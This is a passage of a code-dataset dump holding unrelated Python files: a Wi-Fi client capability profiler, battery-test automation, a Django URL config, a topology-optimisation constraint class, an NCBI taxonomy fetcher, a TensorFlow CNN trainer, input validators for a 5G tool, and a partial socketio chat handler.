reported*\", db_key=\"802.11r\", db_value=0\n )\n if ft_disabled:\n dot11r.value = \"Reporting disabled (--no11r option used)\"\n elif FT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n dot11r.value = \"Supported\"\n dot11r.db_value = 1\n else:\n pass\n\n return [dot11r]\n\n @staticmethod\n def analyze_ext_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11v support \"\"\"\n dot11v = Capability(\n name=\"802.11v\", value=\"Not reported*\", db_key=\"802.11v\", db_value=0\n )\n\n if EXT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n\n ext_cap_list = dot11_elt_dict[EXT_CAPABILITIES_IE_TAG]\n\n # check octet 3 exists\n if 3 <= len(ext_cap_list):\n\n # bit 4 of octet 3 in the extended capabilites field\n octet3 = ext_cap_list[2]\n bss_trans_support = int(\"00001000\", 2)\n\n # 'And' octet 3 to test for bss transition support\n if octet3 & bss_trans_support:\n dot11v.value = \"Supported\"\n dot11v.db_value = 1\n\n return [dot11v]\n\n @staticmethod\n def analyze_rsn_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11w support \"\"\"\n dot11w = Capability(\n name=\"802.11w\", value=\"Not reported\", db_key=\"802.11w\", db_value=0\n )\n\n if RSN_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n\n rsn_cap_list = dot11_elt_dict[RSN_CAPABILITIES_IE_TAG]\n rsn_len = len(rsn_cap_list) - 2\n pmf_oct = rsn_cap_list[rsn_len]\n\n # bit 8 of 2nd last octet in the rsn capabilites field\n if 127 <= pmf_oct:\n dot11w.value = \"Supported\"\n dot11w.db_value = 1\n\n return [dot11w]\n\n @staticmethod\n def analyze_power_capability_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for supported power capabilities \"\"\"\n max_power_cap = Capability(\n name=\"Max_Power\",\n value=\"Not reported\",\n db_key=\"max_power\",\n db_value=\"Not reported\",\n )\n min_power_cap = Capability(\n name=\"Min_Power\",\n value=\"Not reported\",\n db_key=\"min_power\",\n db_value=\"Not reported\",\n )\n\n if POWER_MIN_MAX_IE_TAG in dot11_elt_dict.keys():\n\n # octet 3 of power capabilites\n max_power = dot11_elt_dict[POWER_MIN_MAX_IE_TAG][1]\n min_power = dot11_elt_dict[POWER_MIN_MAX_IE_TAG][0]\n\n # check if signed\n if min_power > 127:\n signed_min_power = (256 - min_power) * (-1)\n else:\n signed_min_power = min_power\n\n max_power_cap.value = f\"{max_power} dBm\"\n max_power_cap.db_value = max_power\n min_power_cap.value = f\"{signed_min_power} dBm\"\n min_power_cap.db_value = signed_min_power\n\n return [max_power_cap, min_power_cap]\n\n @staticmethod\n def analyze_supported_channels_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check supported channels \"\"\"\n supported_channels = Capability(\n name=\"Supported_Channels\",\n value=\"Not reported\",\n db_key=\"SupportedChannels\",\n db_value=None,\n )\n if SUPPORTED_CHANNELS_IE_TAG in dot11_elt_dict.keys():\n channel_sets_list = dot11_elt_dict[SUPPORTED_CHANNELS_IE_TAG]\n channel_list = []\n\n while channel_sets_list:\n\n start_channel = channel_sets_list.pop(0)\n channel_range = channel_sets_list.pop(0)\n\n # check for if 2.4Ghz or 5GHz\n if start_channel > 14:\n channel_multiplier = 4\n else:\n channel_multiplier = 1\n\n for i in range(channel_range):\n channel_list.append(start_channel + (i * channel_multiplier))\n\n supported_channels.value = \",\".join(map(str, channel_list))\n supported_channels.db_value = channel_list\n\n return [supported_channels]\n\n @staticmethod\n def analyze_extension_ies(dot11_elt_dict: dict, he_disabled: bool) -> []:\n \"\"\" Check for 802.11ax support \"\"\"\n dot11ax_draft = Capability(\n 
name=\"802.11ax_draft\",\n value=\"Not supported\",\n db_key=\"802.11ax_draft\",\n db_value=\"0\",\n )\n if he_disabled:\n dot11ax_draft.value = \"Reporting disabled (--no11ax option used)\"\n else:\n if EXT_IE_TAG in dot11_elt_dict.keys():\n for element_data in dot11_elt_dict[EXT_IE_TAG]:\n\n ext_ie_id = str(element_data[0])\n\n dot11ax_draft_ids = {\"35\": \"802.11ax (Draft)\"}\n\n # check for 802.11ax support\n if ext_ie_id in dot11ax_draft_ids.keys():\n dot11ax_draft.value = \"Supported (Draft)\"\n dot11ax_draft.db_value = 1\n\n return [dot11ax_draft]\n\n def analyze_assoc_req(self, frame) -> Tuple[str, list]:\n \"\"\" Tear apart the association request for analysis \"\"\"\n log = logging.getLogger(inspect.stack()[0][3])\n\n # log.debug(\"processing information elements for client MAC %s\", frame.addr2)\n\n # strip radiotap\n ie_buffer = bytes(frame.payload)\n\n # strip dot11\n ie_buffer = ie_buffer[24:]\n\n # strip params\n ie_buffer = ie_buffer[4:]\n\n # strip fcs\n ie_buffer = ie_buffer[:-4]\n\n # convert buffer to ie dict\n dot11_elt_dict = self.process_information_elements(ie_buffer)\n\n log.debug(\n \"%s IEs detected in assoc req from %s: %s\",\n len(dot11_elt_dict),\n frame.addr2,\n dot11_elt_dict.keys(),\n )\n\n # resolve manufacturer\n oui_manuf = self.resolve_oui_manuf(frame.addr2, dot11_elt_dict)\n\n # dictionary to store capabilities as we decode them\n capabilities = []\n\n # check if 11k supported\n capabilities += self.analyze_rm_capabilities_ie(dot11_elt_dict)\n\n # check if 11r supported\n capabilities += self.analyze_ft_capabilities_ie(\n dot11_elt_dict, self.ft_disabled\n )\n\n # check if 11v supported\n capabilities += self.analyze_ext_capabilities_ie(dot11_elt_dict)\n\n # check if 11w supported\n capabilities += self.analyze_rsn_capabilities_ie(dot11_elt_dict)\n\n # check for 11n support\n capabilities += self.analyze_ht_capabilities_ie(dot11_elt_dict)\n\n # check for 11ac support\n capabilities += self.analyze_vht_capabilities_ie(dot11_elt_dict)\n\n # check for Ext tags (e.g. 802.11ax draft support)\n capabilities += self.analyze_extension_ies(dot11_elt_dict, self.he_disabled)\n\n # check supported power capabilities\n capabilities += self.analyze_power_capability_ie(dot11_elt_dict)\n\n # check supported channels\n capabilities += self.analyze_supported_channels_ie(dot11_elt_dict)\n\n return oui_manuf, capabilities\n","sub_path":"profiler2/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":24733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43315603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 13:24:35 2019\n@author: Alexander\nSummary: Class used to measure the entropy coefficient as there is a change in\n temperature and consequentially the OCV. Each test must take 21 hours\nNote to self: Remember to add '/test' before you describe what test type it is\nNote to self: Add escape characters to file paths \\\\ not \\\nNote to self: Add shell=True and then pass a string\nNote to self: executables that run through the shell will halt the program. 
Must use popen, call will block your program\nNote to self: ser.readline also includes the new line char and carraige return, get rid of '/r/n' by using [:-2]\nNote to self: When trying to write to a file using the print function you must specify that print(\"text\",file=FILEOBJJ) otherwise it won't write\n\"\"\"\nimport subprocess # Use so that you can call shell commands\nimport time\nimport serial\nimport os\n\n\nfrom TemperatureClass import TemperatureClass\n\n# Gives the battery type as a string\ndef BatteryType():\n capacity = 3.0\n ChemType = \"Li-ion\"\n return \"/battery \"+str(capacity)+\",1,3.7,1,\"+ChemType\n\nclass CBA_ConstantDischargeRate:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory):\n TestName = \"/test discharge 0.125 /cutoff 2.8 /samplerate 1000\" # the cut off is always 2.8V\n GraphOptions = \"/title \\\"OCV Estimate 0.125 Discharge [A]\\\"\"\n FileLocation = \"/open \\\"\"+CurrentDirectory+\"\\\\OCVEstimateTest_0125_A.bt2\\\"\"\n CommandString = CBAExecutableFileLocation + \" \" + TestName + \" \" + BatteryType() + \" \" + GraphOptions + \" \" + FileLocation\n print(CommandString) # test\n subprocess.Popen(CommandString,shell=True)\n\nclass CBA_Charge:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory,Amps,GraphExt):\n self.CutOff = 0.2\n Cycles = 1\n HighVoltage = 4.75\n TestName = \"/test chargedischarge \\\"Charge\\\",\"+str(Cycles)+\",\"+str(Amps)+\",\"+str(HighVoltage)+\" /chargeampmin 0.2 /chargerecovery 3 /dischargerecovery 3 /cutoff 2.8 /samplerate 1000 /graphcurrent\"\n GraphOptions = \"/title \\\"Charge At \"+str(GraphExt)+\" [W]\\\"\"\n FileLocation = \"/open \\\"\"+CurrentDirectory+\"\\\\ChargeFrom_\"+str(GraphExt)+\"_W.bt2\\\"\"\n CommandString = CBAExecutableFileLocation + \" \" + TestName + \" \" + BatteryType() + \" \" + GraphOptions + \" \" + FileLocation\n print(CommandString) # test\n subprocess.Popen(CommandString,shell=True)\n \nclass CBA_FirstCharge:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory,Amps):\n self.CutOff = 0.2\n Cycles = 1\n HighVoltage = 4.75\n TestName = \"/test chargedischarge \\\"Charge\\\",\"+str(Cycles)+\",\"+str(Amps)+\",\"+str(HighVoltage)+\" /chargeampmin 0.2 /chargerecovery 3 /dischargerecovery 3 /cutoff 2.8 /samplerate 1000 /graphcurrent\"\n GraphOptions = \"/title \\\"First Charge\\\"\"\n FileLocation = \"/open \\\"\"+CurrentDirectory+\"\\\\FirstCharge.bt2\\\"\"\n CommandString = CBAExecutableFileLocation + \" \" + TestName + \" \" + BatteryType() + \" \" + GraphOptions + \" \" + FileLocation\n print(\"command = \"+CommandString)\n subprocess.Popen(CommandString,shell=True)\n \nclass OCVEstimateClass:\n def __init__(self,CBAExecutableFileLocation,CurrentDirectory,MaxTemperature):\n self.CBAPID = \"\" # No CBA instance should be running\n self.MaxT = MaxTemperature # Maximum temperature before stopping the test\n \n if self.DoesCBAExist() == True: # Checks to see if there are any instances of the CBA program running, if so it will kill them\n print(\"ERROR: THere are multiple instances of CBA when starting\")\n self.KillExcessCBA()\n \n ser = serial.Serial() # A serial communications instance Called ser\n ser.baudrate = 9600 \n ser.port = 'COM3' # The Communications court will have to be changed depending upon the device used.\n ser.open()\n \n try: # Attmps to read and write to the serial port\n print(\"Opened the serial port successfully, delete me later\")\n TempData = TemperatureClass() \n \n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters 
at end '/r/n'\n \n if TempString == \"Starting\": # Check it has started properly\n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n \n TempData.AddData(TempString)\n else:\n print(\"ERROR, incorrect starting serial value\")\n \n # First Charge\n CBA_FirstCharge(CBAExecutableFileLocation,CurrentDirectory,1.675)\n self.SetCBAPID()\n TempData.InitialTime = time.time() # Reset the time\n \n while self.DoesCBAExist() == True and TempData.Thermo_Ave[-1] < self.MaxT:\n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n TempData.AddData(TempString)\n \n print(\"Finished first charge...\")\n \n \n CBA_ConstantDischargeRate(CBAExecutableFileLocation,CurrentDirectory)\n self.SetCBAPID()\n TempData.InitialTime = time.time() # Reset the time\n \n FileName = str( time.strftime(\"%b_%d_%Y-%H_%M_%S\", time.localtime()) )\n FileName = FileName + \"_OCV_Current_0125_A.csv\"\n FileObj = open(CurrentDirectory+os.sep+FileName,'w')\n print(\"Successfully created a new file with the path \"+CurrentDirectory+os.sep+FileName)\n \n print(\"TIMESTAMP,STATE,AVERAGE TEMPERATURE,AVERAGE COLD JUNCTION,CJ1,Temp1,CJ2,Temp2\\n\",file=FileObj)\n FileObj.flush()\n\n while self.DoesCBAExist() == True and TempData.Thermo_Ave[-1] < self.MaxT:\n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n TempData.AddData(TempString)\n TempData.WriteLine(FileObj)\n \n # Allow a cool down of 5 hours\n FileObj.close()\n \n TempData.status = \"Cool Down\"\n t_end = time.time() + 60*60*5 # Allow MAX 5 hours cool down\n t_end_min_wait = time.time() + 60*60*2 # Allow 2 hours for chemical equilibrium to be reached in the battery\n # Keep waiting for the \n while time.time() < t_end and ( (TempData.Thermo_Ave[-1] - TempData.CJ_Ave[-1]) > 2 or time.time() < t_end_min_wait ): \n TempString = ser.readline().decode(\"utf-8\")[:-2] # remove new line characters at end '/r/n'\n TempData.AddData(TempString)\n \n except: \n print(\"Some error\")\n ser.close() # close serial\n ser.close() # close serial\n print(\"finished...\")\n # Checks to see if there is a CBA program running. 
Returns true if there is one or more instances running\n \n def DoesCBAExist(self):\n ReturnVariable = False # Assume worst case scenario\n command = \"tasklist\"\n TempValue = subprocess.run(command, stdout=subprocess.PIPE,shell=True)\n StringValue = TempValue.stdout.decode(\"utf-8\")\n if \"WMRCBA.exe\" in StringValue: # It has found it\n if self.CBAPID in StringValue:\n ReturnVariable = True\n if StringValue.count(\"WMRCBA.exe\") > 1:\n print(\"ERROR: multiple instances of CBA programs\")\n \n return ReturnVariable\n \n # Set the CBA PID, if there are two instances go for the last one and start an error\n def SetCBAPID(self):\n CBAIndex = -1\n command = \"tasklist\"\n TempValue = subprocess.run(command, stdout=subprocess.PIPE,shell=True)\n StringValue = TempValue.stdout.decode(\"utf-8\")\n for Line in StringValue.splitlines():\n if \"WMRCBA.exe\" in Line: # It has found it\n CBAIndex += 1 # increment by one \n LineParts = Line.split(\" \")\n while \"\" in LineParts:\n LineParts.remove(\"\")\n PID = LineParts[1] \n\n if CBAIndex == 0:\n self.CBAPID = PID\n else:\n print(\"ERROR: There are two instances of the CBA program\")\n subprocess.run(\"Taskkill /PID \"+PID)\n print(\"Killed program with PID = \"+PID)\n\n def KillExcessCBA(self): \n command = \"tasklist\"\n TempValue = subprocess.run(command, stdout=subprocess.PIPE,shell=True)\n StringValue = TempValue.stdout.decode(\"utf-8\")\n for Line in StringValue.splitlines():\n if \"WMRCBA.exe\" in Line: # It has found it \n LineParts = Line.split(\" \")\n while \"\" in LineParts:\n LineParts.remove(\"\")\n PID = LineParts[1] \n\n if PID != self.CBAPID:\n print(\"ERROR: There are two instances of the CBA program\")\n subprocess.run(\"Taskkill /PID \"+PID+\" /F\")\n print(\"Killed program with PID = \"+PID)\n \n","sub_path":"Code/TestComputer/_Combined_Resistance_Code_V2/OCVEstimateClass.py","file_name":"OCVEstimateClass.py","file_ext":"py","file_size_in_byte":9205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106495835","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\n\r\napp_name = \"todolists\"\r\n\r\nurlpatterns = [\r\n url(r'^$', views.homepage, name='homepage'),\r\n url(r'^add_todo_list$', views.add_todo_list, name='add_todo_list'),\r\n url(r'^add_todo$', views.add_todo, name='add_todo'),\r\n url(r'^delete_todo/(?P\\d+)', views.delete_todo, name='delete_todo'),\r\n url(r'^edit_todo/(?P\\d+)', views.edit_todo, name='edit_todo'),\r\n]\r\n","sub_path":"todolists/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"622181504","text":"\"\"\"\nConstraints class used to specify the density constraints of the topology\noptimisation problem. It contains functions for minimum and maximum element\ndensity in the upcomming iteration and the magnitude of the volume constraint\nfunction itself of the current design. 
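(For a quick worked check of the constraint below: with nelx = nely = 2 and
volume_frac = 0.5, a uniform density of 0.5 gives
np.sum(x)/(nelx*nely*volume_frac) - 1 = 2.0/2.0 - 1 = 0, i.e. the volume
constraint is exactly active; positive values mean the design uses too much
material.)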
This version of the code is used for the\ncompliant design, local displacement maximisation.\n\nBram Lagerweij\nAerospace Structures and Materials Department TU Delft\n2018\n\"\"\"\n\nimport numpy as np\n\n\nclass DensityConstraint(object):\n    \"\"\"\n    This object relates to the constraints used in this optimization.\n    It can be used by the MMA update scheme to derive the limits for all\n    element densities at every iteration.\n    The class itself is not changed by the iterations.\n\n    Attributes\n    -------\n    nelx : int\n        Number of elements in x direction.\n    nely : int\n        Number of elements in y direction.\n    move : float\n        Maximum change in density of an element over 1 iteration.\n    volume_frac : float\n        Maximum volume that can be filled with material.\n    volume_derivative : 2D array size(1, nelx*nely)\n        Sensitivity of the density constraint to the density in each element.\n    density_min : float (optional)\n        Minimum density, set at 0.0 if not specified.\n    density_max : float (optional)\n        Maximum density, set at 1.0 if not specified.\n\n    Methods\n    -------\n    xmin(x)\n        Returns the minimum density values of all elements for this iteration.\n    xmax(x)\n        Returns the maximum density values of all elements for this iteration.\n    current_volconstrain(x)\n        Returns the current magnitude of the volume constraint function.\n    \"\"\"\n    def __init__(self, nelx, nely, move, volume_frac, density_min=0.0, density_max=1.0):\n        self.nelx = nelx\n        self.nely = nely\n        self.move = move\n        self.volume_frac = volume_frac\n        self.volume_derivative = 1/(nelx*nely*volume_frac)*np.ones((1, nely*nelx))\n        self.density_min = density_min\n        self.density_max = density_max\n\n    def xmin(self, x):\n        \"\"\"\n        This function calculates the minimum density value of all elements for\n        this iteration.\n\n        Parameters\n        -------\n        x : 2D array size(nely, nelx)\n            Density distribution of this iteration.\n\n        Returns\n        -------\n        xmin : 2D array size(nely, nelx)\n            Minimum density values of this iteration for the update scheme.\n        \"\"\"\n        xmin = self.density_min*np.ones((self.nely, self.nelx))\n        xmin = np.maximum(xmin, x - self.move)\n        return xmin\n\n    def xmax(self, x):\n        \"\"\"\n        This function calculates the maximum density value of all elements for\n        this iteration.\n\n        Parameters\n        -------\n        x : 2D array size(nely, nelx)\n            Density distribution of this iteration.\n\n        Returns\n        -------\n        xmax : 2D array size(nely, nelx)\n            Maximum density values of this iteration after updating.\n        \"\"\"\n        xmax = self.density_max*np.ones((self.nely, self.nelx))\n        xmax = np.minimum(xmax, x + self.move)\n        return xmax\n\n    def current_volconstrain(self, x):\n        \"\"\"\n        Calculates the current magnitude of the volume constraint function: ::\n\n                           ∑ x\n            cur_vol = ────────────────── - 1\n                      nelx*nely*vol_frac\n\n        Parameters\n        -------\n        x : 2D array size(nely, nelx)\n            Density distribution of this iteration.\n\n        Returns\n        -------\n        cur_vol : float\n            Current value of the density constraint function.\n        \"\"\"\n        cur_vol = np.sum(x)/(self.nelx*self.nely*self.volume_frac) - 1\n        return cur_vol\n","sub_path":"src_Actuator/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"298520472","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n'''\nGrace Cagle\nAssignment 18 Task 1\n\nA program reading a file of species names, retrieving taxonomic information\nfrom NCBI and writing it to a CSV file\n'''\n\nimport argparse\n# import glob\n# import os\nfrom Bio import Entrez\nimport time\nimport csv\n\nnames = ['superclass', 'class', 'subclass', 'infraclass', 'superorder',\n'order', 'superfamily', 'family', 'genus']\n\n\ndef get_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        '-i', \"--infile\",\n        required=True,\n        help=\"A file containing species names\"\n    )\n    parser.add_argument(\n        '-o', \"--outfile\",\n        required=True,\n        help=\"The output file name\"\n    )\n    return parser.parse_args()\n\n\ndef read_file(args):\n    with open(args.infile, 'r') as f:\n        sp = f.read().strip('\\n').split('\\n')\n    # print(sp)\n    return sp\n\n\ndef get_ID(sp):\n    Entrez.email = 'gcagle1@lsu.edu'\n    tax_id_list = []\n    for s in sp:\n        esearch_query = Entrez.esearch(db='taxonomy', term=s, retmode='xml')\n        esearch_result = Entrez.read(esearch_query)\n        tax_id = esearch_result['IdList']\n        tax_id_list.append(tax_id)\n        time.sleep(1)\n    return tax_id_list\n\n\ndef get_tax(tax_id_list):\n    taxonomy = []\n    for each_id in tax_id_list:\n        search = Entrez.efetch(id=each_id, db=\"taxonomy\", retmode='xml')\n        data = Entrez.read(search)\n        taxonomy.append(data)\n    return taxonomy\n\n\ndef make_dict(tax_id_list, taxonomy):\n    data = []\n    for x in range(len(tax_id_list)):\n        data.append({d['Rank']: d['ScientificName'] for d in taxonomy[x][0]['LineageEx'] if d['Rank'] in names})\n    return data\n\n\ndef write_csv(args, data):\n    with open(args.outfile, 'w') as csvfile:\n        writer = csv.DictWriter(csvfile, restval='', fieldnames=names)\n        writer.writeheader()\n        for d in data:\n            writer.writerow(d)\n\n\ndef main():\n    args = get_args()\n    sp = read_file(args)\n    tax_id_list = get_ID(sp)\n    taxonomy = get_tax(tax_id_list)\n    data = make_dict(tax_id_list, taxonomy)\n    write_csv(args, data)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"answers/gcagle1/18_task1.py","file_name":"18_task1.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"468874475","text":"import tensorflow as tf\nimport matplotlib.image as mpimg\nimport numpy as np\nimport os\nimport csv\nimport sys\nsys.path.insert(0, '..\\\\..\\\\..\\\\memomingTools')\nfrom memomingTools import csv_batch_container\n\nbatch_size = 32\ntraining_epochs = 100\nimg_size = 48\nnum_classes = 2\n\nX = tf.placeholder( tf.float32, shape=[None,img_size,img_size,1], name=\"input_0\")\nY = tf.placeholder( tf.float32, shape=[None,2])\nis_training = tf.placeholder( tf.bool, name=\"is_training_0\" )\n\n# Convolutional Layer #1\nconv1_layers = tf.layers.conv2d ( inputs=X, filters=32, kernel_size=[3,3], padding=\"SAME\", activation=tf.nn.relu, use_bias=True )\npool1_layers = tf.layers.max_pooling2d( inputs=conv1_layers, pool_size=[2,2], padding=\"SAME\", strides=2 )\ndropout1_layers = tf.layers.dropout( inputs=pool1_layers, rate=0.5, training=is_training )\n\n# # Convolutional Layer #2\nconv2_layers = tf.layers.conv2d ( inputs=dropout1_layers, filters=64, kernel_size=[3,3], padding=\"SAME\", activation=tf.nn.relu, use_bias=True )\npool2_layers = tf.layers.max_pooling2d( inputs=conv2_layers, pool_size=[2,2], padding=\"SAME\", strides=2 )\ndropout2_layers = tf.layers.dropout( inputs=pool2_layers, rate=0.5, training=is_training )\n\n# # Convolutional Layer #3\nconv3_layers = tf.layers.conv2d ( inputs=dropout2_layers, filters=128, kernel_size=[3,3], padding=\"SAME\", activation=tf.nn.relu, use_bias=True )\npool3_layers = tf.layers.max_pooling2d( inputs=conv3_layers, pool_size=[2,2], padding=\"SAME\", strides=2 )\ndropout3_layers = tf.layers.dropout( inputs=pool3_layers, rate=0.5, training=is_training )\n\nflat = tf.contrib.layers.flatten( dropout3_layers )\ndense4 = tf.layers.dense(inputs=flat, units=625, activation=tf.nn.relu ) # 625: not sure what to use for this part.\ndropout4 = tf.layers.dropout( inputs=dense4, rate=0.5, training=is_training )\n\nlogits = tf.layers.dense(inputs=dropout4, units=2, activation=None, use_bias=True, name=\"logits_0\" )\ncost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=logits) )\noptimizer = tf.train.AdamOptimizer(0.0005).minimize(cost)\nsaver = tf.train.Saver()\n\ndef training_model ( sess, x_data, y_data ):\n    return sess.run( [ cost, optimizer], feed_dict={ X: x_data, Y:y_data, is_training:True} )\n\nwith tf.Session() as sess :\n    sess.run(tf.global_variables_initializer())\n\n    for epoch in range(training_epochs):\n        avg_cost = 0\n        path = \"..\\\\..\\\\data\\\\individual_model\\\\\"\n        train = csv_batch_container( path + \"train_data.csv\" )\n        total_batch = round((train.num_examples() / batch_size) + 0.5 ) # round up\n\n        for i in range(total_batch):\n            batch_xl, batch_yl = train.next_batch(batch_size)\n            batch_xs = list()\n            batch_ys = list()\n\n            for j in range(len(batch_xl)) :\n                t_img = mpimg.imread( path + \"dummy_data_big\\\\\" + batch_xl[j] )\n                t_imp = np.resize(t_img, (img_size,img_size,1) )\n                batch_xs.append(t_imp)\n                t_ls = [0,0]\n                t_ls[ int(batch_yl[j]) ] = 1\n                batch_ys.append( t_ls )\n\n            # Train\n            c, _ = training_model ( sess, batch_xs, batch_ys )\n            avg_cost += c / total_batch\n\n        print('Epoch: ', '%04d' %(epoch + 1), 'Cost = ', avg_cost)\n    print('Training Finished....! \\n\\n')\n\n\n    save_path = saver.save( sess, \"saved_model\" + os.sep + 'woojae_model.ckpt' )\n    print(\"Model saved to %s\" % save_path)\n\n\n    # Testing\n    batch_size = 64\n    correct = 0\n    csv_container = csv_batch_container(path + \"test_data.csv\")\n    total_batch = round((csv_container.num_examples() / batch_size) + 0.5 ) # round up\n\n    batch_xl, batch_yl = csv_container.next_batch(batch_size)\n    batch_xs = list()\n    batch_ys = list()\n\n    for j in range(len(batch_xl)) :\n        t_img = mpimg.imread( path + \"dummy_data_big\\\\\"+ batch_xl[j] )\n        t_imp = np.resize(t_img, (img_size,img_size,1) )\n        batch_xs.append(t_imp)\n        t_ls = [0,0]\n        t_ls[ int(batch_yl[j]) ] = 1\n        batch_ys.append( t_ls )\n\n    prediction_list = sess.run(logits, feed_dict={X:batch_xs, is_training:False})\n\n    for i in range(len(prediction_list)) :\n        print(\"Predict :\",np.argmax(prediction_list[i]),\"Label :\",np.argmax(batch_ys[i]))\n        if (np.argmax(prediction_list[i]) == np.argmax(batch_ys[i])) :\n            correct += 1\n\n    print(\"Accuracy :\",correct/batch_size*100,\"%\")\n","sub_path":"python/individual_model/make_individual_model.py","file_name":"make_individual_model.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"339704344","text":"\"\"\"\nModule for validating user input\n\"\"\"\nimport json\n\nfrom PyInquirer import ValidationError\nfrom PyInquirer import Validator\n\n\nclass NumberValidator(Validator):\n    \"\"\"Validate strings are numbers\"\"\"\n\n    def validate(self, document):\n        \"\"\"Specifically validate the string is a number between 0 and 65535\"\"\"\n        try:\n            int(document.text)\n        except ValueError as value_error: # pragma: no cover\n            raise ValidationError(\n                message='Please enter a number',\n                cursor_position=len(document.text)) from value_error # pragma: no cover\n        if int(document.text) < 0 or int(document.text) > 65535:\n            raise ValidationError(\n                message='Please enter a number between 0 and 65535',\n                cursor_position=len(document.text)) # pragma: no cover\n\n\nclass MCCValidator(Validator):\n    \"\"\"Validate string is a MCC code\"\"\"\n\n    def validate(self, document):\n        \"\"\"Specifically validate the string is a number between 000 and 999\"\"\"\n        try:\n            int(document.text.lstrip('0'))\n        except ValueError as value_error: # pragma: no cover\n            raise ValidationError(\n                message='Please enter a number',\n                cursor_position=len(document.text)) from value_error # pragma: no cover\n        if int(document.text.lstrip('0')) < 0 or int(document.text.lstrip('0')) > 999 or len(document.text) != 3:\n            raise ValidationError(\n                message='Please enter a number between 000 and 999',\n                cursor_position=len(document.text)) # pragma: no cover\n\n\nclass MNCValidator(Validator):\n    \"\"\"Validate string is a MNC code\"\"\"\n\n    def validate(self, document):\n        \"\"\"Specifically validate the string is a number between 00 and 99\"\"\"\n        try:\n            int(document.text.lstrip('0'))\n        except ValueError as value_error: # pragma: no cover\n            raise ValidationError(\n                message='Please enter a number',\n                cursor_position=len(document.text)) from value_error # pragma: no cover\n        if int(document.text.lstrip('0')) < 0 or int(document.text.lstrip('0')) > 99 or len(document.text) != 2:\n            raise ValidationError(\n                message='Please enter a number between 00 and 99',\n                cursor_position=len(document.text)) # pragma: no cover\n\n\nclass IMSIValidator(Validator):\n    \"\"\"Validate string is a list of IMSIs\"\"\"\n\n    def validate(self, document):\n        \"\"\"Specifically validate the string is a JSON
parsable list of records\"\"\"\n imsi = None\n try:\n imsi = json.loads(document.text)\n except Exception as err: # pragma: no cover\n raise ValidationError(\n message='Not valid JSON',\n cursor_position=len(document.text)) from err # pragma: no cover\n if not isinstance(imsi, list):\n raise ValidationError(\n message='Must be a list of IMSI records',\n cursor_position=len(document.text)) # pragma: no cover\n","sub_path":"blue/5G/daedalus/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"234962109","text":"'''\nCreated on 2 Jan 2017\n\n@author: chrisdoherty\n'''\n\n# Occupied state configuration\noccupied_config = {\n # Time to wait for no detections thereby assuming the room is now unoccupied\n # Seconds\n \"timeout\": 30\n }\n\n# Unoccupied state configuration\nunoccupied_config = {\n # The time between consecutive detections in seconds that contribute to the \n # 'threshold' argument. We look for <= the interval between detections.\n \"max_detection_interval\": 30, \n \n # The number of consecutive detections with the specified interval required \n # before we assume the room is occupied\n \"required_consecutive_detections\": 1\n }\n\n# Represenst the hub room configuration\nhub_room_config = {\n # The pin the motion sensor is attached to.\n \"sensing_pin\": 4\n }","sub_path":"src/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381942112","text":"nome = input('Digite Seu Nome: ')\nnmi = nome.lower()\nnma = nome.upper()\nnlet= nome.strip().split()\nnomee = nome.replace(' ','')\nletras = len(nomee)\nletum = len(nlet [0])\nprint('Seu nome em minúsculo: {}'.format(nmi))\nprint('Seu nome em Maiúsculo: {}'.format(nma))\nprint('Número de letras sem contar os espaços: {}'.format(letras))\nprint('Número de Letras do seu primeiro nome: {}'.format(letum))\n","sub_path":"Python Exercises/ex022.py","file_name":"ex022.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"200839273","text":"import logging\n\nfrom socketio.namespace import BaseNamespace\nfrom socketio.mixins import RoomsMixin, BroadcastMixin\nfrom socketio.sdjango import namespace\n\n@namespace('/chat')\nclass ChatNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):\n nicknames = []\n\n def initialize(self):\n self.logger = logging.getLogger(\"socketio.chat\")\n self.log(\"Socketio session started\")\n \n \n def log(self, message):\n self.logger.info(\"[{0}] {1}\".format(self.socket.sessid, message))\n \n def on_join(self, room):\n self.join(room)\n return True\n \n def on_nickname(self, nickname):\n 